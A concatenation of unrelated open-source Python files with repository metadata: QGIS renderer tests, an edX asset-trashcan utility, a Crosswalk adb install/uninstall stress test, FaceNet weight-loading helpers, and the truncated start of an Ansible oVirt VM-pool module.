if test_support.is_jython:
# XXX: Jython doesn't support sha224
del TestVectorsTestCase.test_sha224_rfc4231
hashlib.sha224 = None
test_support.run_unittest(
TestVectorsTestCase,
ConstructorTestCase,
SanityTestCase,
CopyTestCase
)
if __name__ == "__main__":
test_main()
|
epl-1.0
|
gioman/QGIS
|
tests/src/python/test_qgsgraduatedsymbolrenderer.py
|
1
|
17127
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsGraduatedSymbolRenderer
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Chris Crook'
__date__ = '3/10/2014'
__copyright__ = 'Copyright 2014, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis # NOQA
from qgis.testing import unittest, start_app
from qgis.core import (QgsGraduatedSymbolRenderer,
QgsRendererRange,
QgsRendererRangeLabelFormat,
QgsMarkerSymbol,
QgsGradientColorRamp,
QgsVectorLayer,
QgsFeature,
QgsGeometry,
QgsPoint,
QgsReadWriteContext,
QgsRenderContext
)
from qgis.PyQt.QtCore import Qt
from qgis.PyQt.QtXml import QDomDocument
from qgis.PyQt.QtGui import QColor
start_app()
#===========================================================
# Utility functions
def createMarkerSymbol():
symbol = QgsMarkerSymbol.createSimple({
"color": "100,150,50",
"name": "square",
"size": "3.0"
})
return symbol
def createMemoryLayer(values):
ml = QgsVectorLayer("Point?crs=epsg:4236&field=id:integer&field=value:double",
"test_data", "memory")
# Data as list of x, y, id, value
assert ml.isValid()
pr = ml.dataProvider()
fields = pr.fields()
for id, value in enumerate(values):
x = id * 10.0
feat = QgsFeature(fields)
feat['id'] = id
feat['value'] = value
g = QgsGeometry.fromPoint(QgsPoint(x, x))
feat.setGeometry(g)
pr.addFeatures([feat])
ml.updateExtents()
return ml
def createColorRamp():
return QgsGradientColorRamp(
QColor(255, 0, 0),
QColor(0, 0, 255)
)
def createLabelFormat():
format = QgsRendererRangeLabelFormat()
template = "%1 - %2 meters"
precision = 5
format.setFormat(template)
format.setPrecision(precision)
format.setTrimTrailingZeroes(True)
return format
# Note: Dump functions are not designed for a user friendly dump, just
# for a moderately compact representation of a rendererer that is independent
# of the renderer source code and so appropriate for use in unit tests.
def dumpRangeBreaks(ranges):
return dumpRangeList(ranges, breaksOnly=True)
def dumpRangeLabels(ranges):
return dumpRangeList(ranges, labelsOnly=True)
def dumpLabelFormat(format):
return (
':' + format.format() +
':' + str(format.precision()) +
':' + str(format.trimTrailingZeroes()) +
':')
def dumpRangeList(rlist, breaksOnly=False, labelsOnly=False):
rstr = '('
format = "{0:.4f}-{1:.4f}"
if not breaksOnly:
format = format + ":{2}:{3}:{4}:"
if labelsOnly:
format = '{2}'
for r in rlist:
rstr = rstr + format.format(
r.lowerValue(),
r.upperValue(),
r.label(),
r.symbol().dump(),
r.renderState(),
) + ","
return rstr + ')'
# Crude dump for deterministic ramp - just dumps colors at a range of values
def dumpColorRamp(ramp):
if ramp is None:
return ':None:'
rampstr = ':'
for x in (0.0, 0.33, 0.66, 1.0):
rampstr = rampstr + ramp.color(x).name() + ':'
return rampstr
def dumpGraduatedRenderer(r):
rstr = ':'
rstr = rstr + r.classAttribute() + ':'
rstr = rstr + str(r.mode()) + ':'
symbol = r.sourceSymbol()
if symbol is None:
rstr = rstr + 'None' + ':'
else:
rstr = rstr + symbol.dump() + ':'
rstr = rstr + dumpColorRamp(r.sourceColorRamp())
rstr = rstr + dumpRangeList(r.ranges())
return rstr
#=================================================================
# Tests
class TestQgsGraduatedSymbolRenderer(unittest.TestCase):
def testQgsRendererRange_1(self):
"""Test QgsRendererRange getter/setter functions"""
range = QgsRendererRange()
self.assertTrue(range)
lower = 123.45
upper = 234.56
label = "Test label"
symbol = createMarkerSymbol()
range.setLowerValue(lower)
self.assertEqual(range.lowerValue(), lower, "Lower value getter/setter failed")
range.setUpperValue(upper)
self.assertEqual(range.upperValue(), upper, "Upper value getter/setter failed")
range.setLabel(label)
self.assertEqual(range.label(), label, "Label getter/setter failed")
range.setRenderState(True)
self.assertTrue(range.renderState(), "Render state getter/setter failed")
range.setRenderState(False)
self.assertFalse(range.renderState(), "Render state getter/setter failed")
range.setSymbol(symbol.clone())
self.assertEqual(symbol.dump(), range.symbol().dump(), "Symbol getter/setter failed")
range2 = QgsRendererRange(lower, upper, symbol.clone(), label, False)
self.assertEqual(range2.lowerValue(), lower, "Lower value from constructor failed")
self.assertEqual(range2.upperValue(), upper, "Upper value from constructor failed")
self.assertEqual(range2.label(), label, "Label from constructor failed")
self.assertEqual(range2.symbol().dump(), symbol.dump(), "Symbol from constructor failed")
self.assertFalse(range2.renderState(), "Render state getter/setter failed")
def testQgsRendererRangeLabelFormat_1(self):
"""Test QgsRendererRangeLabelFormat getter/setter functions"""
format = QgsRendererRangeLabelFormat()
self.assertTrue(format, "QgsRendererRangeLabelFomat construction failed")
template = "%1 - %2 meters"
precision = 5
format.setFormat(template)
self.assertEqual(format.format(), template, "Format getter/setter failed")
format.setPrecision(precision)
self.assertEqual(format.precision(), precision, "Precision getter/setter failed")
format.setTrimTrailingZeroes(True)
self.assertTrue(format.trimTrailingZeroes(), "TrimTrailingZeroes getter/setter failed")
format.setTrimTrailingZeroes(False)
self.assertFalse(format.trimTrailingZeroes(), "TrimTrailingZeroes getter/setter failed")
minprecision = -6
maxprecision = 15
self.assertEqual(QgsRendererRangeLabelFormat.MIN_PRECISION, minprecision, "Minimum precision != -6")
self.assertEqual(QgsRendererRangeLabelFormat.MAX_PRECISION, maxprecision, "Maximum precision != 15")
format.setPrecision(-10)
self.assertEqual(format.precision(), minprecision, "Minimum precision not enforced")
format.setPrecision(20)
self.assertEqual(format.precision(), maxprecision, "Maximum precision not enforced")
def testQgsRendererRangeLabelFormat_2(self):
"""Test QgsRendererRangeLabelFormat number format"""
format = QgsRendererRangeLabelFormat()
# Tests have precision, trim, value, expected
# (Note: Not sure what impact of locale is on these tests)
tests = (
(2, False, 1.0, '1.00'),
(2, True, 1.0, '1'),
(2, False, 1.234, '1.23'),
(2, True, 1.234, '1.23'),
(2, False, 1.236, '1.24'),
(2, False, -1.236, '-1.24'),
(2, False, -0.004, '0.00'),
(2, True, 1.002, '1'),
(2, True, 1.006, '1.01'),
(2, True, 1.096, '1.1'),
(3, True, 1.096, '1.096'),
(-2, True, 1496.45, '1500'),
(-2, True, 149.45, '100'),
(-2, True, 79.45, '100'),
(-2, True, 49.45, '0'),
(-2, True, -49.45, '0'),
(-2, True, -149.45, '-100'),
)
for f in tests:
precision, trim, value, expected = f
format.setPrecision(precision)
format.setTrimTrailingZeroes(trim)
result = format.formatNumber(value)
self.assertEqual(result, expected,
"Number format error {0}:{1}:{2} => {3}".format(
precision, trim, value, result))
# Label tests - label format, expected result.
# Labels will be evaluated with lower=1.23 upper=2.34, precision=2
ltests = (
("%1 - %2", "1.23 - 2.34"),
("%1", "1.23"),
("%2", "2.34"),
("%2%", "2.34%"),
("%1%1", "1.231.23"),
("from %1 to %2 meters", "from 1.23 to 2.34 meters"),
("from %2 to %1 meters", "from 2.34 to 1.23 meters"),
)
format.setPrecision(2)
format.setTrimTrailingZeroes(False)
lower = 1.232
upper = 2.339
for t in ltests:
label, expected = t
format.setFormat(label)
result = format.labelForLowerUpper(lower, upper)
self.assertEqual(result, expected, "Label format error {0} => {1}".format(
label, result))
range = QgsRendererRange()
range.setLowerValue(lower)
range.setUpperValue(upper)
label = ltests[0][0]
format.setFormat(label)
result = format.labelForRange(range)
self.assertEqual(result, ltests[0][1], "Label for range error {0} => {1}".format(
label, result))
def testQgsGraduatedSymbolRenderer_1(self):
"""Test QgsGraduatedSymbolRenderer: Basic get/set functions """
# Create a renderer
renderer = QgsGraduatedSymbolRenderer()
symbol = createMarkerSymbol()
renderer.setSourceSymbol(symbol.clone())
self.assertEqual(symbol.dump(), renderer.sourceSymbol().dump(), "Get/set renderer source symbol")
attr = '"value"*"value"'
renderer.setClassAttribute(attr)
self.assertEqual(attr, renderer.classAttribute(), "Get/set renderer class attribute")
for m in (
QgsGraduatedSymbolRenderer.Custom,
QgsGraduatedSymbolRenderer.EqualInterval,
QgsGraduatedSymbolRenderer.Quantile,
QgsGraduatedSymbolRenderer.Jenks,
QgsGraduatedSymbolRenderer.Pretty,
QgsGraduatedSymbolRenderer.StdDev,
):
renderer.setMode(m)
self.assertEqual(m, renderer.mode(), "Get/set renderer mode")
format = createLabelFormat()
renderer.setLabelFormat(format)
self.assertEqual(
dumpLabelFormat(format),
dumpLabelFormat(renderer.labelFormat()),
"Get/set renderer label format")
ramp = createColorRamp()
renderer.setSourceColorRamp(ramp)
self.assertEqual(
dumpColorRamp(ramp),
dumpColorRamp(renderer.sourceColorRamp()),
"Get/set renderer color ramp")
renderer.setSourceColorRamp(ramp)
self.assertEqual(
dumpColorRamp(ramp),
dumpColorRamp(renderer.sourceColorRamp()),
"Get/set renderer color ramp")
# test for classificatio with varying size
renderer.setGraduatedMethod(QgsGraduatedSymbolRenderer.GraduatedSize)
renderer.setSourceColorRamp(None)
renderer.addClassLowerUpper(0, 2)
renderer.addClassLowerUpper(2, 4)
renderer.addClassLowerUpper(4, 6)
renderer.setSymbolSizes(2, 13)
self.assertEqual(renderer.maxSymbolSize(), 13)
self.assertEqual(renderer.minSymbolSize(), 2)
refSizes = [2, (13 + 2) * .5, 13]
ctx = QgsRenderContext()
for idx, symbol in enumerate(renderer.symbols(ctx)):
self.assertEqual(symbol.size(), refSizes[idx])
def testQgsGraduatedSymbolRenderer_2(self):
"""Test QgsGraduatedSymbolRenderer: Adding /removing/editing classes """
# Create a renderer
renderer = QgsGraduatedSymbolRenderer()
symbol = createMarkerSymbol()
renderer.setSourceSymbol(symbol.clone())
symbol.setColor(QColor(255, 0, 0))
# Add class without start and end ranges
renderer.addClass(symbol.clone())
renderer.addClass(symbol.clone())
renderer.updateRangeLabel(1, 'Second range')
renderer.updateRangeLowerValue(1, 10.0)
renderer.updateRangeUpperValue(1, 25.0)
renderer.updateRangeRenderState(1, False)
symbol.setColor(QColor(0, 0, 255))
renderer.updateRangeSymbol(1, symbol.clone())
# Add as a rangeobject
symbol.setColor(QColor(0, 255, 0))
range = QgsRendererRange(20.0, 25.5, symbol.clone(), 'Third range', False)
renderer.addClassRange(range)
# Add class by lower and upper
renderer.addClassLowerUpper(25.5, 30.5)
# (Update label for sorting tests)
renderer.updateRangeLabel(3, 'Another range')
self.assertEqual(
dumpRangeLabels(renderer.ranges()),
'(0.0 - 0.0,Second range,Third range,Another range,)',
'Added ranges labels not correct')
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(0.0000-0.0000,10.0000-25.0000,20.0000-25.5000,25.5000-30.5000,)',
'Added ranges lower/upper values not correct')
# Check that clone function works
renderer2 = renderer.clone()
self.assertEqual(
dumpGraduatedRenderer(renderer),
dumpGraduatedRenderer(renderer2),
"clone function doesn't replicate renderer properly"
)
# Check save and reload from Dom works
doc = QDomDocument()
element = renderer.save(doc, QgsReadWriteContext())
renderer2 = QgsGraduatedSymbolRenderer.create(element, QgsReadWriteContext())
self.assertEqual(
dumpGraduatedRenderer(renderer),
dumpGraduatedRenderer(renderer2),
"Save/create from DOM doesn't replicate renderer properly"
)
# Check sorting
renderer.sortByLabel()
self.assertEqual(
dumpRangeList(renderer.ranges(), labelsOnly=True),
'(0.0 - 0.0,Another range,Second range,Third range,)',
'sortByLabel not correct')
renderer.sortByValue()
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(0.0000-0.0000,10.0000-25.0000,20.0000-25.5000,25.5000-30.5000,)',
'sortByValue not correct')
renderer.sortByValue(Qt.DescendingOrder)
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(25.5000-30.5000,20.0000-25.5000,10.0000-25.0000,0.0000-0.0000,)',
'sortByValue descending not correct')
# Check deleting
renderer.deleteClass(2)
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(25.5000-30.5000,20.0000-25.5000,0.0000-0.0000,)',
'deleteClass not correct')
renderer.deleteAllClasses()
self.assertEqual(len(renderer.ranges()), 0, "deleteAllClasses didn't delete all")
# void addClass( QgsSymbol* symbol );
# //! @note available in python bindings as addClassRange
# void addClass( QgsRendererRange range ) /PyName=addClassRange/;
# //! @note available in python bindings as addClassLowerUpper
# void addClass( double lower, double upper ) /PyName=addClassLowerUpper/;
# void deleteClass( int idx );
# void deleteAllClasses();
def testQgsGraduatedSymbolRenderer_3(self):
"""Test QgsGraduatedSymbolRenderer: Reading attribute data, calculating classes """
# Create a renderer
renderer = QgsGraduatedSymbolRenderer()
symbol = createMarkerSymbol()
renderer.setSourceSymbol(symbol.clone())
# Test retrieving data values from a layer
ml = createMemoryLayer((1.2, 0.5, 5.0, 1.0, 1.0, 1.2))
renderer.setClassAttribute("value")
# Equal interval calculations
renderer.updateClasses(ml, renderer.EqualInterval, 3)
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(0.5000-2.0000,2.0000-3.5000,3.5000-5.0000,)',
'Equal interval classification not correct')
# Quantile classes
renderer.updateClasses(ml, renderer.Quantile, 3)
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(0.5000-1.0000,1.0000-1.2000,1.2000-5.0000,)',
'Quantile classification not correct')
renderer.updateClasses(ml, renderer.Quantile, 4)
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(0.5000-1.0000,1.0000-1.1000,1.1000-1.2000,1.2000-5.0000,)',
'Quantile classification not correct')
# Tests still needed
# Other calculation method tests
# createRenderer function
# symbolForFeature correctly selects range
if __name__ == "__main__":
unittest.main()
|
gpl-2.0
|
jjmiranda/edx-platform
|
common/lib/xmodule/xmodule/contentstore/utils.py
|
235
|
1470
|
from xmodule.contentstore.content import StaticContent
from .django import contentstore
def empty_asset_trashcan(course_locs):
'''
This method will hard delete all assets (optionally within a course_id) from the trashcan
'''
store = contentstore('trashcan')
for course_loc in course_locs:
# first delete all of the thumbnails
thumbs = store.get_all_content_thumbnails_for_course(course_loc)
for thumb in thumbs:
print "Deleting {0}...".format(thumb)
store.delete(thumb['_id'])
# then delete all of the assets
assets, __ = store.get_all_content_for_course(course_loc)
for asset in assets:
print "Deleting {0}...".format(asset)
store.delete(asset['_id'])
def restore_asset_from_trashcan(location):
'''
This method will restore an asset which got soft deleted and put back in the original course
'''
trash = contentstore('trashcan')
store = contentstore()
loc = StaticContent.get_location_from_path(location)
content = trash.find(loc)
# ok, save the content into the courseware
store.save(content)
# see if there is a thumbnail as well, if so move that as well
if content.thumbnail_location is not None:
try:
thumbnail_content = trash.find(content.thumbnail_location)
store.save(thumbnail_content)
except Exception:
pass # OK if this is left dangling
|
agpl-3.0
|
jacky-young/crosswalk-test-suite
|
stability/stability-iterative-android-tests/iterative/Install_Uninstall_Repeatedly.py
|
2
|
3521
|
#!/usr/bin/env python
#coding=utf-8
#
# Copyright (c) 2015 Intel Corporation.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of works must retain the original copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the original copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this work without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION 'AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors:
# Hongjuan, Wang<[email protected]>
import unittest
import os, sys, commands, shutil
import time
import subprocess
reload(sys)
sys.setdefaultencoding( 'utf-8' )
SCRIPT_PATH = os.path.realpath(__file__)
ConstPath = os.path.dirname(SCRIPT_PATH)
def setUp():
global device
#device = 'E6OKCY411012'
device = os.environ.get('DEVICE_ID')
if not device:
print 'Get env error\n'
sys.exit(1)
class TestStabilityIterativeFunctions(unittest.TestCase):
def test_install_uninstall_repeatedly(self):
setUp()
global testName, runtime
testName = 'test_install_uninstall_repeatedly'
runtime = 7200
pre_time = time.time()
sysmon_path = ConstPath + '/sysmon.sh'
sysmon_cmd = sysmon_path + ' ' + testName + ' ' + str(runtime) + ' org.xwalk.iterative'
subprocess.Popen(args=sysmon_cmd, shell=True)
i = 0
while True:
i = i + 1
cmd = 'adb -s ' + device + ' install -r ' + ConstPath + '/../iterative*.apk'
inststatus = commands.getstatusoutput(cmd)
elapsed_time = time.time() - pre_time
if inststatus[0] == 0:
if elapsed_time >= runtime:
#kill process
print i, elapsed_time, 'Process finished'
uninststatus = commands.getstatusoutput('adb -s ' + device + ' uninstall org.xwalk.iterative')
self.assertEquals(uninststatus[0], 0)
break
else:
uninststatus = commands.getstatusoutput('adb -s ' + device + ' uninstall org.xwalk.iterative')
self.assertEquals(uninststatus[0], 0)
print i, elapsed_time, 'Continue'
time.sleep(3)
else:
self.assertFalse(True, 'Install apk failed')
#print 'Install apk failed'
break
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
sunyihuan326/DeltaLab
|
Andrew_NG_learning/class_four/week_four/FR/fr_utils.py
|
1
|
8668
|
#### PART OF THIS CODE IS USING CODE FROM VICTOR SY WANG: https://github.com/iwantooxxoox/Keras-OpenFace/blob/master/utils.py ####
import tensorflow as tf
import numpy as np
import os
# import cv2
from numpy import genfromtxt
from keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate
from keras.models import Model
from keras.layers.normalization import BatchNormalization
from keras.layers.pooling import MaxPooling2D, AveragePooling2D
import h5py
import matplotlib.pyplot as plt
_FLOATX = 'float32'
def variable(value, dtype=_FLOATX, name=None):
v = tf.Variable(np.asarray(value, dtype=dtype), name=name)
_get_session().run(v.initializer)
return v
np.linalg.norm
def shape(x):
return x.get_shape()
def square(x):
return tf.square(x)
def zeros(shape, dtype=_FLOATX, name=None):
return variable(np.zeros(shape), dtype, name)
def concatenate(tensors, axis=-1):
if axis < 0:
axis = axis % len(tensors[0].get_shape())
return tf.concat(axis, tensors)
def LRN2D(x):
return tf.nn.lrn(x, alpha=1e-4, beta=0.75)
def conv2d_bn(x,
layer=None,
cv1_out=None,
cv1_filter=(1, 1),
cv1_strides=(1, 1),
cv2_out=None,
cv2_filter=(3, 3),
cv2_strides=(1, 1),
padding=None):
num = '' if cv2_out == None else '1'
tensor = Conv2D(cv1_out, cv1_filter, strides=cv1_strides, data_format='channels_first', name=layer + '_conv' + num)(
x)
tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer + '_bn' + num)(tensor)
tensor = Activation('relu')(tensor)
if padding == None:
return tensor
tensor = ZeroPadding2D(padding=padding, data_format='channels_first')(tensor)
if cv2_out == None:
return tensor
tensor = Conv2D(cv2_out, cv2_filter, strides=cv2_strides, data_format='channels_first', name=layer + '_conv' + '2')(
tensor)
tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer + '_bn' + '2')(tensor)
tensor = Activation('relu')(tensor)
return tensor
WEIGHTS = [
'conv1', 'bn1', 'conv2', 'bn2', 'conv3', 'bn3',
'inception_3a_1x1_conv', 'inception_3a_1x1_bn',
'inception_3a_pool_conv', 'inception_3a_pool_bn',
'inception_3a_5x5_conv1', 'inception_3a_5x5_conv2', 'inception_3a_5x5_bn1', 'inception_3a_5x5_bn2',
'inception_3a_3x3_conv1', 'inception_3a_3x3_conv2', 'inception_3a_3x3_bn1', 'inception_3a_3x3_bn2',
'inception_3b_3x3_conv1', 'inception_3b_3x3_conv2', 'inception_3b_3x3_bn1', 'inception_3b_3x3_bn2',
'inception_3b_5x5_conv1', 'inception_3b_5x5_conv2', 'inception_3b_5x5_bn1', 'inception_3b_5x5_bn2',
'inception_3b_pool_conv', 'inception_3b_pool_bn',
'inception_3b_1x1_conv', 'inception_3b_1x1_bn',
'inception_3c_3x3_conv1', 'inception_3c_3x3_conv2', 'inception_3c_3x3_bn1', 'inception_3c_3x3_bn2',
'inception_3c_5x5_conv1', 'inception_3c_5x5_conv2', 'inception_3c_5x5_bn1', 'inception_3c_5x5_bn2',
'inception_4a_3x3_conv1', 'inception_4a_3x3_conv2', 'inception_4a_3x3_bn1', 'inception_4a_3x3_bn2',
'inception_4a_5x5_conv1', 'inception_4a_5x5_conv2', 'inception_4a_5x5_bn1', 'inception_4a_5x5_bn2',
'inception_4a_pool_conv', 'inception_4a_pool_bn',
'inception_4a_1x1_conv', 'inception_4a_1x1_bn',
'inception_4e_3x3_conv1', 'inception_4e_3x3_conv2', 'inception_4e_3x3_bn1', 'inception_4e_3x3_bn2',
'inception_4e_5x5_conv1', 'inception_4e_5x5_conv2', 'inception_4e_5x5_bn1', 'inception_4e_5x5_bn2',
'inception_5a_3x3_conv1', 'inception_5a_3x3_conv2', 'inception_5a_3x3_bn1', 'inception_5a_3x3_bn2',
'inception_5a_pool_conv', 'inception_5a_pool_bn',
'inception_5a_1x1_conv', 'inception_5a_1x1_bn',
'inception_5b_3x3_conv1', 'inception_5b_3x3_conv2', 'inception_5b_3x3_bn1', 'inception_5b_3x3_bn2',
'inception_5b_pool_conv', 'inception_5b_pool_bn',
'inception_5b_1x1_conv', 'inception_5b_1x1_bn',
'dense_layer'
]
conv_shape = {
'conv1': [64, 3, 7, 7],
'conv2': [64, 64, 1, 1],
'conv3': [192, 64, 3, 3],
'inception_3a_1x1_conv': [64, 192, 1, 1],
'inception_3a_pool_conv': [32, 192, 1, 1],
'inception_3a_5x5_conv1': [16, 192, 1, 1],
'inception_3a_5x5_conv2': [32, 16, 5, 5],
'inception_3a_3x3_conv1': [96, 192, 1, 1],
'inception_3a_3x3_conv2': [128, 96, 3, 3],
'inception_3b_3x3_conv1': [96, 256, 1, 1],
'inception_3b_3x3_conv2': [128, 96, 3, 3],
'inception_3b_5x5_conv1': [32, 256, 1, 1],
'inception_3b_5x5_conv2': [64, 32, 5, 5],
'inception_3b_pool_conv': [64, 256, 1, 1],
'inception_3b_1x1_conv': [64, 256, 1, 1],
'inception_3c_3x3_conv1': [128, 320, 1, 1],
'inception_3c_3x3_conv2': [256, 128, 3, 3],
'inception_3c_5x5_conv1': [32, 320, 1, 1],
'inception_3c_5x5_conv2': [64, 32, 5, 5],
'inception_4a_3x3_conv1': [96, 640, 1, 1],
'inception_4a_3x3_conv2': [192, 96, 3, 3],
'inception_4a_5x5_conv1': [32, 640, 1, 1, ],
'inception_4a_5x5_conv2': [64, 32, 5, 5],
'inception_4a_pool_conv': [128, 640, 1, 1],
'inception_4a_1x1_conv': [256, 640, 1, 1],
'inception_4e_3x3_conv1': [160, 640, 1, 1],
'inception_4e_3x3_conv2': [256, 160, 3, 3],
'inception_4e_5x5_conv1': [64, 640, 1, 1],
'inception_4e_5x5_conv2': [128, 64, 5, 5],
'inception_5a_3x3_conv1': [96, 1024, 1, 1],
'inception_5a_3x3_conv2': [384, 96, 3, 3],
'inception_5a_pool_conv': [96, 1024, 1, 1],
'inception_5a_1x1_conv': [256, 1024, 1, 1],
'inception_5b_3x3_conv1': [96, 736, 1, 1],
'inception_5b_3x3_conv2': [384, 96, 3, 3],
'inception_5b_pool_conv': [96, 736, 1, 1],
'inception_5b_1x1_conv': [256, 736, 1, 1],
}
def load_weights_from_FaceNet(FRmodel):
# Load weights from csv files (which was exported from Openface torch model)
weights = WEIGHTS
weights_dict = load_weights()
# Set layer weights of the model
for name in weights:
if FRmodel.get_layer(name) != None:
FRmodel.get_layer(name).set_weights(weights_dict[name])
elif model.get_layer(name) != None:
model.get_layer(name).set_weights(weights_dict[name])
def load_weights():
# Set weights path
dirPath = './weights'
fileNames = filter(lambda f: not f.startswith('.'), os.listdir(dirPath))
paths = {}
weights_dict = {}
for n in fileNames:
paths[n.replace('.csv', '')] = dirPath + '/' + n
for name in WEIGHTS:
if 'conv' in name:
conv_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)
conv_w = np.reshape(conv_w, conv_shape[name])
conv_w = np.transpose(conv_w, (2, 3, 1, 0))
conv_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)
weights_dict[name] = [conv_w, conv_b]
elif 'bn' in name:
bn_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)
bn_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)
bn_m = genfromtxt(paths[name + '_m'], delimiter=',', dtype=None)
bn_v = genfromtxt(paths[name + '_v'], delimiter=',', dtype=None)
weights_dict[name] = [bn_w, bn_b, bn_m, bn_v]
elif 'dense' in name:
dense_w = genfromtxt(dirPath + '/dense_w.csv', delimiter=',', dtype=None)
dense_w = np.reshape(dense_w, (128, 736))
dense_w = np.transpose(dense_w, (1, 0))
dense_b = genfromtxt(dirPath + '/dense_b.csv', delimiter=',', dtype=None)
weights_dict[name] = [dense_w, dense_b]
return weights_dict
def load_dataset():
train_dataset = h5py.File('datasets/train_happy.h5', "r")
train_set_x_orig = np.array(train_dataset["train_set_x"][:]) # your train set features
train_set_y_orig = np.array(train_dataset["train_set_y"][:]) # your train set labels
test_dataset = h5py.File('datasets/test_happy.h5', "r")
test_set_x_orig = np.array(test_dataset["test_set_x"][:]) # your test set features
test_set_y_orig = np.array(test_dataset["test_set_y"][:]) # your test set labels
classes = np.array(test_dataset["list_classes"][:]) # the list of classes
train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))
test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))
return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes
def img_to_encoding(image_path, model):
img1 = cv2.imread(image_path, 1)
img = img1[..., ::-1]
img = np.around(np.transpose(img, (2, 0, 1)) / 255.0, decimals=12)
x_train = np.array([img])
embedding = model.predict_on_batch(x_train)
return embedding
|
mit
|
ashemedai/ansible
|
lib/ansible/modules/cloud/ovirt/ovirt_vmpools.py
|
26
|
7566
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovirt_vmpools
short_description: Module to manage VM pools in oVirt
version_added: "2.3"
author: "Ondra Machacek (@machacekondra)"
description:
- "Module to manage VM pools in oVirt."
options:
name:
description:
- "Name of the the VM pool to manage."
required: true
state:
description:
- "Should the VM pool be present/absent."
- "Note that when C(state) is I(absent) all VMs in VM pool are stopped and removed."
choices: ['present', 'absent']
default: present
template:
description:
- "Name of the template, which will be used to create VM pool."
description:
description:
- "Description of the VM pool."
cluster:
description:
- "Name of the cluster, where VM pool should be created."
type:
description:
- "Type of the VM pool. Either manual or automatic."
- "C(manual) - The administrator is responsible for explicitly returning the virtual machine to the pool.
The virtual machine reverts to the original base image after the administrator returns it to the pool."
- "C(Automatic) - When the virtual machine is shut down, it automatically reverts to its base image and
is returned to the virtual machine pool."
- "Default value is set by engine."
choices: ['manual', 'automatic']
vm_per_user:
description:
- "Maximum number of VMs a single user can attach to from this pool."
- "Default value is set by engine."
prestarted:
description:
- "Number of pre-started VMs defines the number of VMs in run state, that are waiting
to be attached to Users."
- "Default value is set by engine."
vm_count:
description:
- "Number of VMs in the pool."
- "Default value is set by engine."
extends_documentation_fragment: ovirt
'''
EXAMPLES = '''
# Examples don't contain auth parameter for simplicity,
# look at ovirt_auth module to see how to reuse authentication:
# Create VM pool from template
- ovirt_vmpools:
cluster: mycluster
name: myvmpool
template: rhel7
vm_count: 2
prestarted: 2
vm_per_user: 1
# Remove vmpool, note that all VMs in pool will be stopped and removed:
- ovirt_vmpools:
state: absent
name: myvmpool
'''
RETURN = '''
id:
description: ID of the VM pool which is managed
returned: On success if VM pool is found.
type: str
sample: 7de90f31-222c-436c-a1ca-7e655bd5b60c
vm_pool:
description: "Dictionary of all the VM pool attributes. VM pool attributes can be found on your oVirt instance
at following url: https://ovirt.example.com/ovirt-engine/api/model#types/vm_pool."
returned: On success if VM pool is found.
'''
try:
import ovirtsdk4.types as otypes
except ImportError:
pass
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ovirt import (
BaseModule,
check_params,
check_sdk,
create_connection,
equal,
get_link_name,
ovirt_full_argument_spec,
wait,
)
class VmPoolsModule(BaseModule):
def build_entity(self):
return otypes.VmPool(
name=self._module.params['name'],
description=self._module.params['description'],
comment=self._module.params['comment'],
cluster=otypes.Cluster(
name=self._module.params['cluster']
